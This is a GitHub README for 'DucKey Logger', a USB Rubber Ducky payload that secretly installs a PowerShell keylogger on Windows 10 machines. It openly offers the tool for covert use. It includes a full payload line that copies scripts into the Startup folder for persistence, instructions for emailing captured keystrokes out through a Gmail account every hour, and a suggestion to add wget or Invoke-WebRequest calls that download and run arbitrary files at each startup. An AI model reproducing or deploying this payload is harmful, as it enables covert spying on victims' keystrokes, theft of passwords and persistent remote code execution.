Skip to content

DucKey Logger [Duck Key Logger] is a PowerShell based keylogger for the USB Rubber Ducky. I believe it is currently the most advanced one out due to its ability to start keylogging and send logs via Gmail at every startup of the computer. it also has an the 'c.cmd' attack opportunity [scroll to bottom].

License

Notifications You must be signed in to change notification settings

PrettyBoyCosmo/DucKey-Logger

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

18 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

DucKey Logger V.2

Chris Taylor [Blue Cosmo] | 08/24/21


:::::::::  :::    :::  ::::::::  :::    ::: :::::::::: :::   :::
:+:    :+: :+:    :+: :+:    :+: :+:   :+:  :+:        :+:   :+:
+:+    +:+ +:+    +:+ +:+        +:+  +:+   +:+         +:+ +:+  
+#+    +:+ +#+    +:+ +#+        +#++:++    +#++:++#     +#++:   
+#+    +#+ +#+    +#+ +#+        +#+  +#+   +#+           +#+    
#+#    #+# #+#    #+# #+#    #+# #+#   #+#  #+#           #+#    
#########   ########   ########  ###    ### ##########    ###     

Update:

An New Version of This Payload Is Available HERE

Overview:

DucKey Logger is a USB RubberDucky payload that uses PowerShell to log keystrokes
  • moves c.cmd file to windows startup directory
  • c.cmd will secretly run p.ps1
  • p.ps1 will log keystrokes
  • l.ps1 will email the logs every startup and every hour [via SMTP]
    • sends logs hourly, regardless of system time

Resources:

Requirements:

  • Twin-Duck firmware
  • Gmail account
    • i suggest making a separate Gmail account for this payload
    • your Gmail must have LSA Access enabled
  • Windows 10 Target

Instructions:

Set-Up/Installation

  1. change Gmail credentials in p.ps1
# gmail credentials
$email = "[email protected]"
$password = "password"
  1. in line 20 of payload.txt, change 'L' to the name of your ducky [SD Card]
STRING $u=gwmi Win32_Volume|?{$_.Label -eq'L'}|select name;cd $u.name;cp .\p.ps1 $env:temp;cp .\c.cmd "C:/Users/$env:UserName/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup";cd $env:temp;echo "">"$env:UserName.log";
  1. flash Twin-Duck firmware on to your duck
  2. load, encode, and deploy!!

Extraneous:

The c.cmd attack opportunity

the c.cmd file runs every startup.
this means an attacker could place a
'wget' or 'Invoke-WebRequest' and have a file
be downloaded from anywhere on the internet onto the computer.
the file would then save in the startup directory,
allowing it to run every startup

About

DucKey Logger [Duck Key Logger] is a PowerShell based keylogger for the USB Rubber Ducky. I believe it is currently the most advanced one out due to its ability to start keylogging and send logs via Gmail at every startup of the computer. it also has an the 'c.cmd' attack opportunity [scroll to bottom].

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published